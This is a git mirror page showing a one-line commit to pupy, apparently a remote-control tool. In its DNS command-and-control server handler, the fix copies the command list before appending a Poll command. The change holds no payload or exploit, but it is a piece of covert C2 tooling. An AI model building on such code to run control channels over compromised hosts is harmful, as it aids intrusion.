mirror of https://github.com/n1nj4sec/pupy.git
dnscnc: fix looped polling
This commit is contained in:
parent
f2c02b4ee2
commit
81ad724baa
|
@ -777,6 +777,7 @@ class DnsCommandServerHandler(BaseResolver):
|
|||
commands = session.commands
|
||||
|
||||
if not session.system_info:
|
||||
commands = commands.copy()
|
||||
commands.append(Poll())
|
||||
|
||||
return commands
|
||||
|
|
Loading…
Reference in New Issue